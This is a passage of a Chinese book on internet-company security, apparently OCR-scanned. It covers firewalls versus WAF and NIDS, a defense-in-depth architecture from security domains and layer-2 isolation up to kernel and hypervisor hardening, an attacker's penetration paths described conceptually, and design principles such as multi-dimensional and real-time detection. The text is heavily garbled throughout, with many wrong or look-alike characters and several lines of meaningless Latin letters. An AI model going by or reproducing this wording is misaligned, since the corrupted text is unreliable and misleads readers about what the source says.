手 的 点 ， 这 征 攻 防 技术 双方 演进 后 的 一 个 状态 ， 反 应 的 是 当前 的 时 间 
点 下 Web 应 用 安全 热门 的 原因 ， 但 这 并 不 会 是 一 个 肖 态 。 随 着 RASP 等 
相关 技术 的 成 熟 ， 对 抗 的 战场 还 会 发 生 进 一 步 的 变化 ， 趋 势 征 一 个 动 
态 变 化 的 过 程 。 


防火 墙 会 消亡 么 ? 这 玩意 儿 其 实 跟 阿司匹林 一 样 ， 狐 药 虽 然 一 直 
在 不 断 间 世 ， 但 是 阿司匹林 长 久 不 彭 。 很 多 人 觉得 防火 寺 这 玩意 儿 没 
什么 价值 量 ， 但 不 代表 它 没有 价值 ， 防 火 墙 的 最 根本 作用 是 减 小 攻击 
面 ， 而 不 是 为 了 解决 反弹 木马 这 样 的 问题 。 觉 得 没有 价值 量 是 因为 人 
们 已 经 对 其 非常 习惯 了 ， 殊 好 像 出 门 罕 衣 服 要 先 罕 内 链 一 样 变 成 了 大 
多 数 人 的 一 种 常识 。 在 利 年 素 月 中 的 积 素 使 得 学 习 和 芝 弘 的 边际 成 本 
递减 ， 很 容易 获取 和 上 手 ， 所 以 大 家 都 没 太 看 重 它 ， 但 是 它 的 价值 是 
由 “假如 没有 防火 墙 ”这 一 命题 来 决定 的 。 如 果 现 在 线 上 的 系统 都 一 下 
子 去 掉 防 火 墙 会 如 何 ， 所 有 Linux 内 核 中 的 netfilter 都 不 加 载 任 何 规 
则 ， 现 实 中 的 安全 状况 会 “一 夜 回 到 解放 前 ”，OWASP 的 地 位 甚至 会 倒 
退 。 有 人 觉得 没 防 火 墙 也 无 所 谓 ， 把 不 必要 的 服务 全 俘 了 束 行 了 。 确 
实 ， 如 采 只 有 一 台 机 妖 你 可 以 那么 干 ， 如 果 是 一 个 复 淋 生产 网 络 的 成 
千 上 万 的 服务 器 ， 归 属于 世界 各 地 的 IDC， 资 产 附 属 同一 组 织 中 不 同 
的 admin 管 理 ， 变 更 完全 不 受 控 ， 没 有 防火 墙 会 如 何 ? 念 怕 是 乱 成 一 锁 
as JME o 


如 果 以 前 的 产品 和 解决 方案 会 被 代替 最 大 的 可 能 性 是 因为 它 的 “ 投 

入 产 出 比 不 那么 高 了 ”， 所 以 新 的 解决 方案 即便 是 技术 上 跨 维度 竞争 ， 
想 奉 代 老 的 解决 方案 必须 做 到 这 一 点 。 比 如 NIDS 是 一 个 全 类 型 协议 分 
析 锋 ，WAF 实 际 上 可 以 看 成 是 一 个 以 HTTP (s) 协议 为 主 的 NIDS 

(NIPS) ， 但 如 果 在 web 服务 为 主 的 生产 网 络 里 ， 除 HTTP/HTTPS 以 
外 的 协议 都 在 边界 被 防火 墙 过 滤 了 ， 在 这 种 场景 下 ， 部 署 IDS (IPS) 
的 价值 就 不 是 那么 大 ， 相 较 而 言 ，WAF 对 HTTP 协 议 拥有 更 强 的 检测 
能 力 ，NIDS、NIPS 的 价值 量 在 这 里 显得 比较 小 ， 因 此 在 总 预算 固定 且 
不 富余 的 情况 下 ，WAEF 完 全 可 以 替代 NIPS。 大 数据 的 解决 方案 什么 时 
候 可 以 替换 原来 的 解决 方案 : 实现 原来 所 有 的 检测 维度 和 检测 深度 ， 
拥有 更 高 的 检 出 率 ， 这 个 时 候 可 以 说 选择 老 的 解决 方案 已 经 彻底 没 价 
值 ， 新 的 产品 会 完全 取代 老 的 产品 形态 ， 但 在 没有 做 到 这 一 点 之 前 ， 
仍然 是 两 者 共存 的 状态 © 


在 当下 的 安全 产业 ， 新 概念 层出不穷 ， 但 有 很 多 属于 旧 酒 北新 
斑 ， 换 淘 不 换 药 。 概 念 变 了 ， 实 操 层 面 扩 展 或 者 优化 了 一 点 ， 但 本 质 
没 变 。 如 有 果 人 被 概念 所 迷惑 ， 安 全 工作 束 会 进入 死胡同 。 尤 其 古 安全 行 
业 的 后 来 者 ， 如 宋 没 有 搞 清 楚 某 项 安全 技术 的 起 源 古 为 解决 什么 问题 
的 ， 而 被 一 堆 高 大 上 的 概念 名 词 所 吸引 ， 甚 至 把 厂商 用 来 宫 销 的 软文 
当成 技术 学 习 的 范本 ， 束 会 跌 入 坑 中 。 在 解决 实际 的 问题 上 ， 低 成 
本 、 人 简单 甚至 无 脑 的 手段 只 要 能 解决 问题 束 好 ， 高 大 上 的 东西 并 不 见 


得 一 定 “管用 ”、“ 好 用 ”。 
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第 5 章 ”防御 架构 原则 


本 章 从 通用 和 全 局 的 角度 介绍 一 下 防御 体系 以 构 的 设计 方法 。 


5.1 防守 体系 建设 三 部 曲 


攻防 对 抗 主 要 是 三 个 层面 的 对 抗 : 信息 对 抗 、 技 术 对 抗 、 运 营 能 
力 对 抗 ， 如 果 我 们 在 这 三 个 层面 可 以 做 到 趋 于 完美 ， 那 么 防守 体系 趋 
于 固 夺 金汤 之 势 是 可 期 待 的 。 


1. 信 息 对 抗 


言 思 对 抗 的 目的 是 知己 知 役 ， 从 两 方面 进行 : 数据 化 和 社会 化 。 


数据 化 指 的 是 企业 目 号 安全 风险 数据 建设 与 分 机 ， 需 要 根据 基线 
数据 、 拓 扑 数 据 、 业 务 数据 梳理 清楚 可 能 存在 的 攻击 路 径 与 攻击 面 ， 
针对 性 设防 。 攻 击 者 得 手 的 原因 往往 并 非 我 们 没有 设防 ， 而 古 不 清楚 
存在 哪些 攻击 面 与 路 径 。 同 时 需要 注意 的 是 ， 这 些 数据 是 动态 变化 
的 ， 需 要 持续 运营 ， 对 于 业务 环境 变更 带 来 的 新 的 攻击 面 与 路 径 需 要 
及 时 补 防 ， 往 往 丝 漏 也 出 现在 对 业务 变更 跟 进 不 够 及 时 的 情况 下 。 


2. 技 术 对 抗 


在 攻防 技术 对 抗 方面 ， 业 界 通 音 写 一 片 碍 观 情绪 ， 认 为 防守 方 总 
苹 处 于 务 势 。 在 通用 的 安全 技术 方面 确实 如 此 ， 因 为 防守 着 面 对 的 是 
一 个 开放 性 的 安全 防御 难题 ， 建 设 的 防御 体系 往往 如 同 “ 马 其 诺 防 
线 ” 一 样 彼 攻击 者 绕 开 。 


但 如 果 我 们 的 防守 体系 解决 的 是 一 个 相对 固定 的 企业 和 业务 ， 或 
者 说 根据 前 述 信息 对 抗 环 节 中 梳理 出 清晰 的 防守 环 艺 ， 那 么 我 们 的 防 
守 体 系 是 可 以 做 到 闭环 的 。 


在 攻防 技术 维度 ， 单 点 设防 的 方式 往往 让 防守 者 陷入 疲 于 应 付 的 
境地 。 但 战场 在 我 们 的 地 副 ， 不 需要 与 对 手 在 同一 个 维度 作战 ， 针 对 
攻击 者 ， 每 个 突破 点 可 以 在 更 高 维度 以 及 多 维度 进行 检测 与 防守 ， 这 
才能 扭转 攻防 的 舌 势 。 


所 以 诸如 HIDSAPI hook 于 命令 注入 和 系统 横 疝 渗透 ，RASP 于 Web 
漏洞 ， 行 为 监测 模型 于 0day 攻 击 ， 是 我 们 扭转 攻防 优势 的 手段 。 


FRAT, fe TRPELI, FTA ERAN 
效 打 。 这 包括 代码 能 力 、 海 量 数据 运 理 、 规 则 的 优化 。 竺 别 是 在 BAT 
这 类 超大 型 网 络 中 ， 往 往 决定 效果 的 不 是 攻防 技术 ， 工 程 化 反而 成 了 
压 垮 安全 项 目的 最 后 一 根 稻草 。 项 目 失败 就 不 要 提 什 么 防守 体系 建设 
ye 


3.12 Be AIT Ht 


貌似 技术 做 好 了 ， 防 守 体 系 应 该 完美 了 ? 并 非 如 此 ! 据 统计 ， 在 
所 有 未 能 阻 断 和 发 现 的 入 侵 案例 中 ， 仅 有 1/3 不 到 是 因为 诸如 0 daydi 
等 扩 术 原因 ， 那 么 剩 下 的 一 半 走 系统 故障 ， 必 一半 走 运 各 工作 没 跟 
ies 


运营 能 力主 要 体现 在 两 方面 : 


1) 风险 闭环 。 简 单 说 束 是 “一 个 问题 不 能 犯 两 次 >"， 通 过 闭环 运营 
让 企业 上 自身 安全 能 力 不 可 逆 地 走向 更 好 。 


2) 执行 力 。 这 涉及 管理 方面 ， 就 不 细 说 了 。 


让 我 们 总 结 一 下 ， 防 守 体 系 建设 三 部 曲 如 图 5-1 所 示 。 
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图 5-1 防守 体系 建设 三 部 曲 


5.2 ”大 规模 生产 网 络 的 纵深 防御 架构 
5.2.1 互联 网 安全 理念 


纵深 防御 这 个 词 在 安全 行业 被 用 得 很 烂 了 ， 乙 方 的 顾问 写 方案 时 
信 手 捏 来 ， 我 想 很 多 人 的 理解 可 能 并 不 一 致 。 其 实 我 比较 赞同 腾讯 
的 “ 河 防 ? 以 及 数字 公司 用 的 “ 塔 防 ” 的 概念 ， 这 些 比 较 贴近 实际 。 下面 展 
开 的 主题 限定 在 大 规模 生产 (对 外 服务 ) 网 络 而 不 是 办 公 网 络 。 当 下 
各 安全 公司 都 偏爱 APT 和 大 数据 威胁 情报 之 类 的 概念 ， 在 办 公 网 络 我 
想 这 些 是 他 们 圈 地 运动 的 战场 ， 不 过 在 生产 网 络 中 似乎 仍然 遥远 。 目 
动 化 运 维 的 交互 模型 跟 大 幅度 人 机 操作 的 办 公 网 络 完全 不 同 ， 而 且 现 
在 号 称 机 器 学 习 的 方法 在 实 操 中 表现 得 很 一 般 ， 效 末 不 如 对 攻防 模型 
抽象 后 定义 规则 的 方式 。 这 里 并 不 是 在 否定 机 器 学 习 的 方法 ， 只 是 表 
达 离 成 熟 还 尚 有 距离 。 


先 说 一 下 互联 网 安全 的 一 些 理念 性 的 东西 ， 没 有 漏洞 是 不 可 能 
的 ， 互 联网 追求 快速 交付 ， 把 安全 做 得 太 厚重 是 “不 满足 业务 需求 
的 >， 为 奶 求 极致 的 低 缺陷 率 而 大 幅 增加 发 布 成 本 走 不 切实 际 鸭 。 但 是 
互联 网 安全 有 几 个 比较 核心 的 需求 : 快速 检测 、 有 限 影 响 、 快 速 漳 
源 、 快 速 恢 复 。 通 俗 解释 一 过 就 是 : 允许 市 着 一 些 问题 上 线 ， 但 是 有 
bug 或 入 侵 时 安全 人 十 能 快速 检测 到 而 不 是 处 于 无 知 无 觉 的 状态 ， 就 算 


发 生 了 攻击 或 入 侵 ， 安 全 人 士 能 做 到 使 入 侵 者 所 获取 的 权限 和 造成 的 
影响 尽 可 能 的 小 ， 并 且 安 全 人 士 有 途径 或 快照 还 原 入 侵 过 程 做 根 因 分 
析 ， 安 全 事件 能 在 基本 不 影响 业务 的 情况 下 恢复 到 健康 状态 。 当 然 ， 
这 个 话题 也 太 大 ， 本 篇 只 讨论 其 中 天 于 “有 限 影响 ”的 部 分 。 


5.2.2 ”攻击 者 视角 


在 谈 及 防御 之 前 先 以 攻击 者 的 视角 看 一 下 攻击 路 径 ， 如 图 5-2 所 


图 5-2 渗透 路 径 思 维 导 图 


Plan-A: 通 党 路径， 从 目标 系统 正面 找 漏 洞 ， 远 程 直接 rootshell 在 
现代 基本 没有 了 ， 大 多 数 是 以 应 用 为 入 口 ， 先 获取 上 层 应 用 的 权限 ， 


然后 通过 上 传 webshell 等 方式 间接 获得 系统 shell， 最 后 提 权 获得 
rootshell ， 后 面 继续 扩大 战果 的 事情 就 不 提 了 ， 安 全 建设 的 思路 自然 是 
要 反 过 来 ， 阻止 攻击 者 扩大 战果 。 


Plan-B: 如 有 果 正 面 没有 明显 可 利用 的 漏洞 ， 就 需要 曲折 迁 回 ， 从 局 
围 信任 域 开始 下 手 ， 这 个 信任 域 是 广义 上 的 ， 包 括 可 arp 重 定 同 的 、 可 
噢 探 的 、 可 会 话 中 间 人 的 、 可 链 路 劫持 的 、 相 同 内 网 的 、 密 码 满足 同 
一 规律 的 、 互 联 互 通信 任 关 系 的 ， 灾 备 或 镜像 站 点 等 ， 获 取 一 个 点 后 
再 折返 ， 之 后 的 路 径 与 A 类 似 。 


Plan-C: 如 采 直 接 针 对 生产 网 络 不 行 ， 就 需要 考虑 社会 工程 学 了 。 
针对 管理 员 和 办 公 网 络 的 APT， 水 坑 攻 击 ; 针对 应 用 后 台 管 理 员 的 社 
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5.2.3 ”防御 者 模型 


安全 建设 是 反 入 侵 视 角 ， 针 对 攻击 活动 中 的 每 一 步 * 埋 点 "， 埋 点 
的 语意 在 于 我 假设 攻击 者 到 了 这 一 步 ， 我 要 阻止 他 进入 下 一 步 ， 或 者 
不 能 市 看 完全 的 火力 进入 下 一 步 还 能 全 映 而 退 。 当 然 ,， 这 里 只 针对 有 
限 影响 ， 入 侵 检测 之 类 的 内 容 这 里 移 不 展开 ， 后 续 会 有 专门 的 介绍 。 
图 5-3 是 一 个 纵深 防御 体系 的 示例 。 


纵深 防御 体系 


Bib ie 
防止 内 核 空间 乱入 DEP&ASLR, StackCanay, SELinux 
OS 层 防御 和 提 权 


Container 层 安 全 


Jvm/Zend hook API, Nginx tomcat 加 固 

WAF (防止 SQL inj, XSS, CSR 等 ) 
APP E 

端 口 协议 过 滤 L3 ACL, L4 Netfilter 


VPC/VxLan/Vlan 


业务 视角 划分 安全 等 级 


图 5-3 ”纵深 防御 体系 示例 


第 一 层 是 安全 域 划分 ， 这 个 安全 域 是 对 业务 的 抽象 ， 并 不 是 对 物 
理 服务 器 的 划分 ， 在 大 规模 分 布 式 架 构 中 ， 同 一 个 安全 域 的 机 器 可 能 
并 不 一 定位 于 同一 个 物理 机 房 ， 但 是 它们 对 应 相同 的 安全 等 级 ， 共 享 
一 组 相同 的 访问 控制 策略 ， 只 对 其 他 安全 域 或 Internet 又 露 有 限 的 协议 
和 接口 。 即 使 攻击 者 渗透 了 其 他 相 邻 的 服务 器 ， 也 只 能 扫描 和 访问 这 
个 安全 域内 有 限 的 几 个 端口 ， 没 办 法 目 由 渗透 ， 这 个 方案 主要 解决 
Plan-B 曲 线 救国 时 被 入 侵 者 “误伤 ”， 即 被 无 意识 的 扫描 行为 以 很 低 的 成 
本 获取 新 的 站 点 和 权限 ， 以 及 获得 单 点 root 后 进一步 渗透 的 扩散 ， 希 望 


能 把 安全 事件 爆发 的 最 大 范围 抑制 在 一 个 安全 域 中 ， 而 不 是 直接 扩散 
到 全 网 。 


第 二 层 是 基于 数据 链 路 层 的 隔离 ， 只 有 第 二 层 隔 离 了 才能 算 真 正 
隔离 ， 否 则 只 在 第 3 层 以 上 做 ACL 效 果 会 差 一 些 ， 仍 然 会 遭受 ARP 攻 
击 。 第 二 层 使 用 VPC、Vxlan、Vlan 等 方法 相当 于 在 安全 域 的 基础 上 对 
一 组 服务 器 以 更 细 的 粒度 再 画 一 道 防线 ， 进 一 步 抑制 单 点 沦陷 后 受害 
源 扩大 的 问题 。 在 不 是 特别 大 的 网 络 中 可 以 直接 跳 过 安全 域 到 这 一 
步 。 当 然 安全 域 的 概念 在 任何 时 候 都 是 存在 的 ， 我 们 在 这 里 仅仅 是 在 
做 划分 的 事情 


第 二 层 之 上 束 是 妆 口 状态 协议 过 滤 ， 这 是 绝 大 多 数 “ 防 火 墙 ”应 用 
的 场景 。 解 决 的 还 是 对 墨客 骏 露 的 攻击 面 的 问题 ， 即 使 我 的 加 固 做 得 
不 到 位 ， 不 必要 的 服务 没有 清理 干净 ， 开 放 了 有 问题 的 端口 ， 甚 至 有 
些 端口 上 跑 着 的 服务 还 有 漏洞 ， 但 是 因为 被 防火 墙 过 滤 了 ， 路 由 不 可 
达 ， 所 以 攻击 者 利用 不 了 ， 他 只 能 在 对 外 或 对 信任 域 又 露 的 端口 上 去 
想 办 法 。 本 质 上 ， 就 古 给 攻击 者 提供 “ 罕 市 *”， 有限 的 访问 通道 。 不 过 
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有 时 候 访问 控制 党 略 不 会 做 得 很 细 粒 度 ， 因 为 那样 的 话 ， 如 果 有 人 台 机 
器 挂 了 ， 换 个 PP 都 麻烦 ， 这 也 是 安全 同业 务 的 妥协 。 


再 往 上 一 层 是 现在 讨 t 0 其 实 从 图 中 也 可 以 看 出 你 
平日 的 工作 都 是 聚焦 于 哪 层 。 这 一 层 单 独 拆 开 都 可 以 再 建 一 个 纵深 防 


御 的 子 体 系 。 应 用 层 通 常 是 暴露 在 Internet 上 的 攻击 面 ， 这 一 层 主要 是 
解决 认证 鉴 权 、 注 入 路 站 上 传 之 类 的 应 用 层 漏 洞 ， 尽 可 能 把 入 侵 者 堵 
在 信息 和 资源 的 唯一 入 口 。 如 果 你 在 开发 WAF， 那 你 对 应 的 也 是 这 一 
层 的 工作 。 


应 用 层 上 方 是 容 右 、 运 行 时 环境 。 这 里 的 日 标 是 假设 服务 右上 的 
应 用 程序 有 漏洞 ， 且 攻击 者 找到 了 漏洞 ， 我 不 希望 这 个 漏洞 能 被 成 功 
利用 ， 直 接 跳 转 到 系统 权限 ， 而 是 希望 能 在 这 一 步 阻 止 攻击 者 ， 办 法 
就 是 通过 容器 加 固 。 比 如 阻止 一 些 危险 函数 的 运行 ， 比 如 上 传 了 
webshell 但 是 不 被 解析 执行 ， 比 如 你 想 执行 eval O 并 用 种 种 方法 变形 
编码 字符 串 拼 接 逃 过 了 应 用 层 的 检测 ， 但 是 到 了 运行 时 其 实 是 相同 的 
底层 指令 ， 那 么 无 论 攻 击 者 在 上 层 多 么 努力 地 变形 ， 我 都 有 可 能 在 更 
撒 层 把 攻击 者 揪 出 来 ， 哪 伯 不 直接 阻 断 ， 我 也 至 少 报 个 警 。 在 绝 大 多 
数 入 侵 活动 中 ， 上 传 或 生成 webshell 是 从 应 用 权限 向 系统 权限 转化 的 关 
键 一 步 ， 所 以 这 一 层 的 防御 也 是 比较 重要 的 。 后 面 会 有 单独 篇 幅 讲 如 
何 对 抗 webshell 。 


如 果 不 驻 之 前 的 步骤 都 没 阻止 攻击 者 ， 对 方 已 经 得 到 了 普通 用 户 
的 shell"$"， 那 么 我 肯定 不 希望 你 继续 得 到 rootshell， 对 抗 的 办 法 就 是 大 
家 常见 的 那些 系统 加 固 项 。 有 很 多 文章 洋洋 酒 酒 写 了 一 大 堆 主 要 就 是 
用 在 这 个 场景 的 ， 不 过 最 主要 的 还 是 对 抗 本 地 提 权 以 及 内 核 提 权 ， 攻 
击 免疫 或 称 攻 击 缓解 机 制 如 SMEP、SMAP、DEP、 各 种 ASLR、stack- 


canay、read-only、PLT、GOT 等 都 是 在 这 里 * 埋 点 >， 其 他 的 诸如 
umask=022 等 也 是 在 这 里 埋 点 。 似 乎 看 上 去 这 些 不 太 需 要 安全 团队 的 介 
入 ， 好 像 都 是 OS 默认 的 机 制 ? 其 实 不 然 ， 安 全 做 到 偏执 的 程度 后 还 是 
有 自己 出 手 的 地 方 ，Android 出 手 比 标准 的 Linux 更 快 一 点 ， 也 许 以 后 就 
真 的 没 太 多 需要 自己 出 手 的 地 方 了 。 不 过 ， 当 下 各 种 基于 LXC 的 容 

给， 越 来 越 多 的 多 租户 的 云 环 境 ， 隅 离 的 机 制 完 全 依赖 于 内 核 的 健壮 
， 这 些 场景 下 对 抗 这 一 层 的 攻击 都 显得 尤为 重要 。 


a 


ne 


如 果 被 拿 走 了 root 自 然 是 很 令 人 不 爽 的 事 ， 但 还 不 是 最 令 人 不 夹 

的 。 如 果 有 一 天 当 你 的 1 万 台 上 服务 器 中 有 500 台 被 攻击 了 ， 而 且 还 不 能 
推断 是 不 是 装 了 kernel rootkit 的 情况 下 ， 这 种 感觉 是 最 要 命 的 。 就 如 同 
你 生 了 个 肿瘤 手术 摘 掉 也 束 算 了 ， 如 果 手 术 完 都 不 确定 摘 了 没有 ， 可 
吏 麻 烦 了 ， 这 时 即便 500 台 服务 右 备 份 数据 、 重 对 系 统 都 不 能 彻底 解决 
问题 ， 而 且 近 似 于 你 某 个 子 业 务 要 人 处 于 离线 状态 ， 对 于 这 种 极其 影响 
可 用 性 的 事情 ， 业 务 部 门 会 把 你 通 疾 掉 。 所 以 不 是 特别 需求 要 干掉 
LKM、/devkmem 并 限制 /devmem 的 全 地 址 空间 读 写 ， 另 外 kernel MAC 
内 核 强 制 访问 控制 也 能 限制 root 只 能 做 有 限 的 事情 ， 尽 管理 论 上 内 核 提 
权 还 是 能 控制 一 切 ， 不 过 要 在 没有 开发 环境 的 服务 器 上 实现 完整 的 
kernel rootkit 功 能 并 保证 不 在 用 户 态 留 下 蛛丝马迹 的 概率 还 是 比较 低 。 
这 样 做 还 有 一 个 好 处 ， 把 入 侵 检测 聚焦 于 用 户 态 ， 不 要 动不动 整 去 装 
一 堆 内 核 级 别 的 重量 级 玩意 儿 ， 大 规模 高 并 发 的 生产 环境 伤 不 起 。 


在 云 计算 环境 中 ， 上 面 那 步 可 能 还 不 算是 单 点 渗透 的 终结 ， 更 确 
层 还 有 hypervisor。 如 琳 攻 击 者 逃 选 出 VM 那 束 比较 狼 儿 了， 每 个 厂商 
都 需要 考虑 一 下 VMM 的 保护 方案 ， 现 在 hypervisor 这 一 层 很 薄 ， 不 会 做 
得 很 重 ， 似 乎 还 没有 特别 成 熟 和 通用 的 方案 ， 不 过 肯定 会 发 展 起 来 ， 
会 有 更 多 类 似 于 XSM 这 样 的 方案 。 


在 一 个 真正 建立 纵深 防御 的 系统 中 ， 入 侵 者 一 般 到 不 了 root 这 一 步 
束 会 补 揪 出 来 ， 只 不 过 完整 的 纵深 防御 分 歼 在 全 书后 续 的 篇 幅 里 ， 这 
里 只 是 选取 了 其 中 一 个 维度 来 试图 解读 这 个 概念 。 男 一 方面 ， 完 整 的 
纵深 防御 体系 只 有 大 型 互联 网 公司 才 可 能 全 禾 盖 ， 因 为 跟 安 全 建设 成 
本 有 关 ， 这 个 问题 之 前 提 到 过 : 不 同 规模 企业 的 安全 需求 和 同一 公司 
在 不 同安 全 建设 阶段 的 需求 是 不 一 样 的 。 


5.2.4 互联 网 安全 架构 设计 原则 


1. 纵 深 防御 


整个 企业 的 安全 架构 是 由 多 层次 的 安全 域 和 对 应 的 安全 机 制 构 成 
的 ， 要 保护 关键 数据 ， 需 要 层 层 设防 ， 层 层 包 围 ， 这 样 束 不 太 可 能 被 
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从 产品 设计 层面 来 讲 ， 即 使 软件 依赖 的 外 层 系 统 安全 机 制 破坏 
时 ， 仍 然 能 保障 应 用 自身 数据 的 安全 性 ， 例 如 在 iOS 越 狱 的 环境 下 ， 系 


统 沙 箱 失效 而 应 用 的 数据 使 用 自 加 密 。 在 HTTPS 被 劫持 的 状态 下 ， 仍 
然 能 保证 post 数 据 中 的 敏感 信息 难以 破解 。 


2. 多 维 防 御 


对 同一 种 攻击 有 多 种 维度 的 防御 和 检测 手段 ， 逃 过 一 层 还 有 额外 
机 制 ， 例 如 ， 对 抗 SQL 注 入 ， 第 一 层 WAF， 第 二 层 Web 日 志 分 析 ， 第 三 
层 RASP， 第 四 层 SQL 审 计 。 


MEUM SDL RE BE: 防御 调 铜 第 一 层 是 静态 代码 扫 摘 ， 
第 二 层 是 编译 过 程 ， 第 三 层 是 运行 时 保护 ， 确 保 的 是 当 其 中 一 层 失效 
时 还 不 至 于 功 亏 一 筑 。 


3. 降 维 防 御 


降 维 防御 是 针对 降 维 攻击 而 言 的 ， 大 意 是 在 攻击 者 不 可 达 、 不 可 
控 、 无 感知 的 更 底层 进行 检测 和 拦截 。 例 如 在 内 核 态 检测 用 户 态 攻 
击 ， 使 用 RASP 在 运行 时 而 不 是 在 cgi 层 面 检测 webshell，HIDS 的 攻击 检 
测 不 在 本 机 判定 ， 而 是 在 云端 计算 ， 入 侵 者 对 其 无 感知 。 


4. 实 时 入 侵 检测 


实时 入 侵 检 测 偏 重 的 是 事 中 进行 时 的 检测 能 力 而 不 是 事后 的 指 
标 。 大 规模 IDC 下， 例如 10 万 多 台 服 务 右 规模 仍然 能 做 到 30 分 钟 以 内 即 
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webshel] 就 能 立即 告警 ， 而 不 是 等 入 侵 活动 阶段 性 结束 ， 攻 击 者 装 了 


rootkit 才 告警 。 


5. 伸 缩 性 、 可 水 平 扩展 


因为 互联 网 的 业务 架构 本 身 追 求 水平 扩 展 ， 所 以 传统 上 支持 几 千 
个 节点 的 产品 ， 如 QRadar、Arcsight 等 在 互联 网 环境 下 基本 无 用 武之 
地 。 不 能 随 业 务 增长 而 扩展 的 安全 解决 方案 是 一 个 致命 伤 。 任 何 安全 
手段 ， 无 论 是 WAF、HIDS， 还 是 IPS， 只 要 不 能 水 平 扩 展 ， 就 一 定 不 
是 好 的 解决 方案 。 


6. 文 持 分 布 式 IDC 


互联 网 公司 的 生产 网 络 一 般 是 多 IDC 部 署 ， 传 统 的 单 层 C/S 架 构 往 
往 只 能 解决 一 个 IDC 中 服务 器 集中 管控 的 情况 。 对 于 海量 IDC 规 模 ， 需 
要 文 持 去 中 心 化 ， 多 级 部 署 ， 解 决 一 系 列 的 失效 、 见 余 和 可 用 性 问 


题 。 
7. 支 持 自动 化 运 维 


服务 紫 数 量 一 多 ， 不 能 日 动 化 运 维 束 不 具有 实际 可 操作 性 、 可 维 
护 性 。 例 如 10 万 台 服 务 器 的 安全 Agent 如 果 不 能 自动 化 分 发 、 自 动 注 
及 、 报 告状 态 ， 统 一 策略 推送 ， 那 束 会 变 成 灾难 。 


8. 低 性 能 损耗 


安全 解决 方案 理论 上 有 很 多 种 可 能 。 从 架构 设计 的 角度 讲 ， 可 以 
hook 内 核 ， 可 以 hook 库 函数 ， 可 以 hook 和 运行 时 容器 ， 可 以 埋 很 多 点 ， 
做 很 多 的 检测 和 限制 ， 或 者 安全 工程 师 可 以 要 求 从 用 户 浏览 器 到 反 疝 
代理 到 应 用 服务 器 ， 到 数据 库 的 连接 全 部 走 SSL/TLS 加 密 。 但 实际 上 ， 
纯 安 全 设计 角度 可 行 的 方案 ， 在 现实 中 未 必 可 行 ， 安 全 带 来 的 性 能 损 
耗 一 大 ， 业 务 方 束 不 能 接受 ， 最 后 只 能 成 为 理论 上 可 行 但 实际 上 不 可 
操作 、 不 可 落地 的 纸上谈兵 。 


另 一 方面 ， 实 操 层 面 也 有 很 多 性 能 损耗 的 大 敌 ， 例 如 扫描 漏洞 的 
疏 虫 慌 到 网 站 负载 广 重 增加 ，HIDS 在 上 万 并 发 的 Nginx 服 务 大 上 运行 了 
一 个 netstat 或 lsof， 服 务 器 瞬间 “ 僵 ? 掉 .…… 这 些 都 是 理论 上 没 错 但 实际 
上 不 可 行 的 安全 措施 。 


9. 能 劳 路 则 不 串联 


“分 光 ”`“ 劳 路 "是 互联 网 侦 爱 的 一 种 方式 ， 究 其 原因 是 不 想 对 业务 
逻辑 改动 ， 串 联 型 安全 措施 最 有 可 能 产生 的 问题 是 : 


1) 业务 响应 的 延迟 ， 这 种 延迟 没 法 通过 堆 谷 扩展 更 多 的 服务 器 来 
解决 。 


2) 误杀 ， 阻 断 了 正常 用 户 的 请 求 。 


3) 对 业务 逻辑 的 影响 ， 因 为 是 串联 ， 业 务 改动 都 要 受制 于 这 个 安 
全 设备 ， 有 时 候 率 一 发 动 全 吴 。 


10. 业 务 无 感知 


所 谓 业 务 无 感知 束 古 安全 方案 的 落地 尽 可 能 地 对 业务 侧 ， 不 断 
网 、 不 改变 拓扑 、 不 改变 业务 逻辑 、 无 性 能 损耗 。 无 颖 集成 有 时 也 是 


这 个 意思 。 
11. 去 “信息 孤岛 ” 


传统 解决 方案 中 单个 安全 设备 注重 解决 “自己 的 事 ”。 例如 IPS 只 关 
注 网 络 而 不 关注 其 他 ， 而 互联 网 环境 下 单 点 的 安全 检测 和 防御 是 不 行 
的 ， 信 息 不 能 封闭 在 一 个 程序 或 设备 中 ， 必 须 可 联动 ， 可 关联 。IOC 的 
信息 必须 在 企业 内 部 做 到 兼容 、 共 享 和 流通 ， 这 也 是 多 维和 纵深 防御 


的 一 个 前 提 。 


12.TCO 可 控 


有 些 商业 安全 产品 也 许 效 果 还 恋 合 ， 小 规模 IDC 部 署 可 能 没 太 多 问 
题 ， 而 一 旦 进入 海量 IDC 环 境 ， 即 使 给 大 客户 折扣 价 也 是 个 天 文 数 字 ， 
这 个 数字 甚至 足以 开 几 家 上 于 人 的 安全 公司 。 无 论 如 何 这 种 TCO 的 解 
决 方案 都 是 不 可 行 的 ， 跟 业务 侧 去 IOE 一 样 ， 在 互联 网 行业 ， 这 是 一 个 
洪 规 则 而 不 是 明 规则 ，TCO 过 高 的 安全 方案 就 像 吸毒 ， 一 开始 没 感 


觉 ， 随 着 IDC 规 模 的 扩大 会 慢 慢 无 法 承受， 此 时 再 转型 就 比较 被 动 。 而 
商业 产品 很 多 功能 其 实 都 是 多 余 的 ， 实 际 环境 簿 陋 的 东西 往往 很 有 
效 ， 这 就 是 目 研 的 必然 性 。 


第 6 章 ” 基 础 安全 措施 


不 管 安全 实践 是 多 么 优秀 的 互联 网 公司 ， 其 安全 体系 都 离 不 开 一 
些 看 起 来 不 那么 高 大 上 的 基础 安全 措施 ， 没 有 了 这 些 ， 上 层 那些 大 数 
据 的 入 侵 检 测 都 如 同 空中 楼 疼 。 之 所 以 能 够 精确 检测 十 因为 在 纵深 防 
御 中 层 层 设 卡 ， 只 需要 在 每 个 环节 关注 有 限 的 “点 ”>， 也 因此 入 侵 检 测 
需要 的 覆盖 面 (广度 ) 和 检测 层次 (深度 ) 上 随 着 攻击 面 的 缩小 而 大 
幅 缩 减 ， 提 高 入 侵 检 测 ROI 的 整 是 一 些 看 起 来 不 太 起 上 服 的 安全 措施 。 
相反 ， 在 低 效 的 安全 解决 方案 里 ， 一 个 安全 设备 放 在 链 路 上 要 检测 所 
有 的 协议 并 关注 所 有 的 行为 告警 ， 让 本 来 束 不 够 高效 的 金子 疲 于 奔 
命 ， 最 后 真正 有 效 的 告警 被 一 大 堆 误 报 淹没 。 


6.1 安全 域 划分 


安全 域 划分 的 目的 是 将 一 组 安全 等 级 相同 的 计算 机 划 入 同一 个 安 
全 域 ， 对 安全 域内 的 计算 机 设置 相同 的 网 络 边界 ， 在 网 络 边界 上 以 最 
小 权限 开放 对 其 他 安全 域 的 NACL (网 络 访问 控制 策略 ) ， 使 得 安全 域 
